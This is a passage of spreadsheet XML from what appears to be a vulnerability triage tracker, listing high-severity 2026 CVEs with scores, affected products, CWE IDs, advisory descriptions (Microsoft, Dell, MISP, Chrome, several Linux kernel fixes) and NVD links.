      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80132</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>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S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80132</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80133</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80133</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81003</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/iucv: filter frames in afiucv_hs_rcv() by ingress device
afiucv_hs_rcv() selects a socket from iucv_sk_list by matching four 8-byte
name fields in the transport header alone. No check is made against the
net_device the frame arrived on.
This can cause a frame arriving on any netdev to be delivered to an AF_IUCV
socket. Three problems follow.
First, a frame arriving over HiperSockets can be delivered to a socket
bound to the classic z/VM IUCV transport, which has iucv-&gt;hs_dev == NULL.
iucv_sock_bind() takes the classic path whenever the requested userid
matches iucv_userid, even on a guest that also has a HiperSockets device
carrying the same identifier. The child socket created by
afiucv_hs_callback_syn() for such a match inherits hs_dev = NULL and
transport = AF_IUCV_TRANS_HIPER, so the first send() on it returns -ENODEV.
The socket delivered to accept() is unusable.
Second, a frame arriving on one netdev can be delivered to a socket bound
to a different IQD device. Which can lead to
- Accept-queue exhaustion (DoS)
- Attacker-controlled peer identity in the child socket
- Data injection into existing sockets
- Fabric noise on the IQD fabric, where bogus replies are sent
- killing established connections
Third, all AF_IUCV sockets live in init_net, as iucv_sock_alloc() calls
sk_alloc(&amp;init_net, ...). But even frames arriving on netdev devices in a
namespace can be delivered to an IUCV socket. So a process in an
unprivileged user and network namespace holding only the CAP_NET_RAW
capability valid within that namespace can send a raw ETH_P_AF_IUCV frame
on its own lo device and have it matched against init_net sockets.
Fix all three by skipping any socket whose hs_dev does not match the
ingress device. A classic z/VM IUCV socket has hs_dev == NULL; the ingress
dev is never NULL, so classic sockets are skipped automatically. An unbound
HIPER socket also has hs_dev == NULL and is skipped. A bound HIPER socket
is only reachable from the exact IQD device it was bound to. Because hs_dev
is always a device in init_net (iucv_sock_bind() scans
for_each_netdev_rcu(&amp;init_net, ...) exclusively), a frame whose ingress
device belongs to another namespace never matches any socket.
Note that AF_IUCV over HiperSockets provides no per-connection
authentication: no sequence numbers, no TLS, no nonce. The four name fields
identifying a connection are exchanged in plaintext on the shared
HiperSockets segment (VCHID). Any host on the same HiperSockets segment
could spoof any frame type against an existing connection. That is a
protocol-level property unchanged by this patch. The fix reduces the attack
surface to peers present on the same HiperSockets segment.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81003</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85237</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in MISP's email-based one-time password (OTP) authentication flow allowed an attacker to perform an unrestricted number of OTP verification attempts.
The email_otp() endpoint did not apply brute-force protection when validating submitted OTP values. An attacker who had reached the OTP verification stage, for example after successfully providing a user's primary authentication credentials, could repeatedly submit candidate OTP values while the same OTP remained valid. This significantly increased the feasibility of guessing the OTP and bypassing the additional authentication factor, potentially resulting in unauthorized access to the affected user's account.
The issue was exacerbated by the fact that the OTP is associated with the user rather than with an individual pending login session, allowing multiple concurrent sessions to attempt guesses against the same valid OTP.
The patch integrates the existing MISP brute-force protection mechanism into the email OTP flow. Failed OTP attempts are now counted against the user, further attempts are rejected once the configured threshold is reached, and the active OTP is invalidated when the attempt budget is exhausted. Blocklisted users are also prevented from requesting the generation of a fresh OTP. In addition, OTP comparison now uses hash_equals() and validates that the submitted value is a string.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85237</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87606</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87606</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89524</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath6kl: clamp assoc request/response lengths before subtracting IE offsets
ath6kl_cfg80211_connect_event() subtracts fixed IE offsets from
assoc_req_len (-= 4) and assoc_resp_len (-= 6), both u8, with no lower
bound. The aggregate check recently added to ath6kl_wmi_connect_event_rx()
bounds the declared lengths from above (their sum must fit the received
event), but an assoc request/response shorter than its fixed offset still
underflows here: the u8 wraps to ~250, and cfg80211_connect_result() /
cfg80211_roamed() then treat that wrapped value as the IE length and copy
that many bytes out of the small assoc_info buffer to user space via
nl80211, disclosing adjacent slab memory.
Clamp both lengths to their offsets before subtracting.
Found by 0sec (https://0sec.ai) using automated source analysis; the
missing lower bound is evident from source. Compile-tested.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89524</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89535</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reorder rpcrdma_rn_unregister before rdma_destroy_id
svc_rdma_free() caches rdma-&gt;sc_cm_id-&gt;device before teardown,
then calls rdma_destroy_id(sc_cm_id) which frees the cm_id.
rpcrdma_rn_unregister() follows, but between those two calls
the transport's sc_rn entry is still installed in the device's
rd_xa. A concurrent ib_unregister_device walk can dispatch
svc_rdma_xprt_done() against the now-freed sc_cm_id.
Move rpcrdma_rn_unregister() before rdma_destroy_id() so the
transport's notification entry is removed from the xarray before
the cm_id it references is destroyed.
Also guard the sc_cm_id dereference with a NULL check: the
following patches introduce paths that reach svc_rdma_free()
with sc_cm_id == NULL (listener create failure, ADDR_CHANGE
replacement failure).</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89535</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89547</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Check svc pool percpu counter allocation
__svc_create() initializes three per-pool percpu_counter stats and
ignores every return value. On SMP, percpu_counter_init() fails when
__alloc_percpu_gfp() cannot satisfy the allocation, leaving the failed
counter with fbc-&gt;counters == NULL and its embedded raw_spinlock_t,
list_head, and count never initialized. __svc_create() returns the
half-constructed svc_serv to nfsd, lockd, or the NFS callback service
anyway.
Once that service is live, the hot-path increments in
svc_xprt_enqueue(), svc_handle_xprt(), and
svc_pool_wake_idle_thread() reach a counter whose backing pointer is
NULL. The pointer is a per-cpu offset, so the access does not fault:
it resolves to offset zero of the current CPU's per-cpu area and
silently corrupts whatever variable lives there. A
/proc/fs/nfsd/pool_stats read walks the same NULL per-cpu storage and
returns garbage, and on CONFIG_DEBUG_SPINLOCK or lockdep it splats on
the never-initialized lock.
Creating the broken service requires a percpu allocation failure during
RPC server startup, so it is reachable only by a local administrator
under memory pressure or fault injection; a remote peer cannot induce
the bad state on its own.
Check each percpu_counter_init() return value in __svc_create() and
fail when an allocation fails, unwinding the counters already set up
in the current pool and in every pool initialized before it. A
discrete percpu_counter_destroy() per counter at teardown frees each
per-cpu allocation exactly once.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89547</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89583</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: eir: Fix OOB read in eir_get_service_data()
eir_get_service_data() walks the advertising data for a Service Data
field with a matching UUID.  On a mismatch it advances:
    eir += dlen;
    eir_len -= dlen;
eir_get_data() reports dlen as the field's data length, but the field
spans dlen + 2 bytes once its length and type bytes count, and more
when non-Service-Data fields were skipped to reach it.  The pointer
lands correctly on the next field.  eir_len does not, and the shortfall
compounds across fields until eir_get_data() reads the length and type
bytes of a "field" past the end of the buffer.
For an ISO broadcast sink that buffer is hcon-&gt;le_per_adv_data[], filled
from the periodic advertising reports of a remote broadcaster.  A PA
payload packed with mismatching Service Data fields walks off the array
into the rest of struct hci_conn.  A drifted field that matches the BAA
UUID puts those bytes in iso_pi(sk)-&gt;base, where user space reads them
back with getsockopt(BT_ISO_BASE).
Recompute eir_len from the end of the buffer each iteration.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89583</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89667</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: close shrinker/GC/fsnotify vs per-net shutdown race in filecache
The shrinker, GC worker, and fsnotify/lease callbacks can unhash an
nfsd_file from the rhashtable and then call
